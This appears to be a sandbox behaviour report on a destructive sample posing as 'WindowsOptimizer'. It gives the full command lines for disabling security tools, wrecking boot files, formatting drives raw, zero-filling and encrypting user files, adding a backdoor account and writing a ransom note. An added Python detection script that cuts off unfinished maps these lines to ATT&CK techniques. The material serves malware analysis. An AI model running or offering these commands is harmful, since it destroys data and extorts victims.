PID 4844 wrote to memory of 1172 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 1480 wrote to memory of 1484 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1484 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1484 wrote to memory of 3044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1484 wrote to memory of 3044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3944 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 3944 wrote to memory of 216 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 3944 wrote to memory of 216 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 1480 wrote to memory of 2708 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2708 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 4452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 2708 wrote to memory of 4452 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\sc.exe
PID 1480 wrote to memory of 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 2416 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 3304 wrote to memory of 2416 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 2036 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2036 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2036 wrote to memory of 4056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2036 wrote to memory of 4056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1980 wrote to memory of 4872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1980 wrote to memory of 4872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2148 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 3528 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2148 wrote to memory of 3528 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 3588 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3588 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 3588 wrote to memory of 2984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 3588 wrote to memory of 2984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1480 wrote to memory of 856 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 856 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 3064 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 856 wrote to memory of 3064 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 1480 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2516 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2464 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2464 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3628 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3628 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1760 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1844 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 2464 wrote to memory of 1764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 2464 wrote to memory of 1764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe
PID 1764 wrote to memory of 3524 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 1764 wrote to memory of 3524 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 3628 wrote to memory of 4220 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cipher.exe
PID 3628 wrote to memory of 4220 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cipher.exe
PID 1480 wrote to memory of 4588 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 4588 | N/A | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 4996 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\fsutil.exe
PID 1844 wrote to memory of 4996 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\fsutil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled

C:\Windows\system32\sc.exe

sc config wuauserv start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll

C:\Windows\system32\net.exe

net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cipher.exe

cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {bootmgr} /f

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f

C:\Windows\system32\bcdedit.exe

bcdedit /delete {default} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /s

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"

C:\Windows\system32\mountvol.exe

mountvol X: /s

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /d

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"

C:\Windows\system32\mountvol.exe

mountvol X: /d

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"

C:\Windows\system32\format.com

format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y

C:\Windows\system32\format.com

format D: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"

C:\Windows\system32\format.com

format E: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:D:\
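Added example, not part of the sandbox report: a rule-based triage pass over process-creation events, run on a constructed event list built from the command lines in the Processes section above (the PIDs are invented and the images are shortened to basenames; the detection rules and the ATT&CK technique IDs are the editor's mapping, not the sandbox's). It matches each command line against the defense-tampering, recovery-inhibition and destruction patterns seen in this run, attaches the process ancestry to each hit, and classifies the run. The classification deliberately ranks destruction above the ransom message: cipher /E encrypts with the logged-in user's own EFS certificate (the efsui.exe /efs /keybackup prompt in the list is Windows offering to back that key up), whereas the fsutil file setZeroData loops, format /fs:raw and the deletion of winload.exe, bootmgr and the EFI boot files destroy data outright, so a responder should treat this sample as a wiper whose ransom note cannot be honoured.

```python
"""Rule-based triage of Windows process-creation events.

Added example, not part of the sandbox report: the constructed event list
reuses command lines from the Processes section of the report with invented
PIDs; the rules and the ATT&CK technique IDs are the editor's own mapping.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str          # ATT&CK technique ID (editor's mapping, not the sandbox's)
    regex: re.Pattern


def _r(name, technique, pattern):
    return Rule(name, technique, re.compile(pattern, re.IGNORECASE))


RULES = [
    _r("Defender disabled via policy key", "T1562.001",
       r'reg\s+add\s+.*Windows Defender.*\s/v\s+DisableAntiSpyware\s+/t\s+REG_DWORD\s+/d\s+1\b'),
    _r("Task Manager or Registry Editor disabled", "T1562.001",
       r'reg\s+add\s+.*\s/v\s+(DisableTaskMgr|DisableRegistryTools)\s+/t\s+REG_DWORD\s+/d\s+1\b'),
    _r("System Restore disabled", "T1490",
       r'reg\s+add\s+.*\s/v\s+DisableSR\s+/t\s+REG_DWORD\s+/d\s+1\b'),
    _r("UAC disabled (EnableLUA=0)", "T1548.002",
       r'reg\s+add\s+.*\s/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b'),
    _r("Firewall disabled for all profiles", "T1562.004",
       r'netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off'),
    _r("Windows Update service stopped or disabled", "T1489",
       r'sc\s+(stop\s+wuauserv|config\s+wuauserv\s+start=\s*disabled)'),
    _r("Boot recovery disabled or boot entry deleted", "T1490",
       r'bcdedit\s+/(set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)'
       r'|delete\s+\{(bootmgr|default|current)\})'),
    _r("Boot chain or system file deletion", "T1561.002",
       r'del\s+/F\s+/Q\s+(C:\\bootmgr|C:\\Windows\\System32\\(winload\.exe|\*\.dll)|X:\\EFI\\)'),
    _r("Volume formatted raw", "T1561.002", r'format\s+[A-Z]:\s+/fs:raw'),
    _r("User files zero-filled with fsutil", "T1485",
       r'fsutil\s+file\s+setZeroData\s+offset=0\s+length=\d{7,}'),
    _r("EFS encryption via cipher /E", "T1486", r'\bcipher\s+/E\b'),
    _r("Ransom note written", "T1486", r'RANSOM_NOTE\.txt'),
    _r("Local account created", "T1136.001", r'\bnet1?\s+user\s+\S+\s+\S+\s+/add\b'),
]

# Constructed events: (pid, ppid, image, command line). PIDs are invented; the
# command lines are taken from the report's Processes section.
SAMPLE_EVENTS = [
    (100, 1, "WindowsOptimizer.exe", r'"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"'),
    (101, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    (102, 101, "reg.exe", r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    (103, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off'),
    (104, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f'),
    (105, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled'),
    (106, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No'),
    (107, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe'),
    (108, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add'),
    (109, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"'),
    (110, 109, "fsutil.exe", r'fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"'),
    (111, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop'),
    (112, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y'),
    (113, 100, "cmd.exe", r'C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt'),
]


def matching_rules(cmdline):
    """Names of the rules whose pattern matches this command line."""
    return [rule.name for rule in RULES if rule.regex.search(cmdline)]


def ancestry(pid, events):
    """Image names from the root of the process tree down to pid."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        _, ppid, image, _ = by_pid[pid]
        chain.append(image)
        pid = ppid
    return list(reversed(chain))


def classify(techniques):
    """Coarse verdict: destruction of data or the boot chain outranks the ransom message."""
    seen = set(techniques)
    if seen & {"T1561.002", "T1485"}:
        return "wiper"
    if "T1486" in seen:
        return "ransomware"
    if seen & {"T1562.001", "T1562.004", "T1548.002", "T1490", "T1489", "T1136.001"}:
        return "defense-tampering"
    return "no-detection"


def triage(events):
    """Run every rule over every event; return per-hit detail, distinct rules, techniques and verdict."""
    hits = []
    for pid, _, _, cmdline in events:
        for rule in RULES:
            if rule.regex.search(cmdline):
                hits.append({"pid": pid, "chain": " > ".join(ancestry(pid, events)),
                             "rule": rule.name, "technique": rule.technique})
    techniques = sorted({h["technique"] for h in hits})
    return {"hits": hits, "rules_fired": sorted({h["rule"] for h in hits}),
            "techniques": techniques, "verdict": classify(techniques)}


if __name__ == "__main__":
    report = triage(SAMPLE_EVENTS)
    for hit in report["hits"]:
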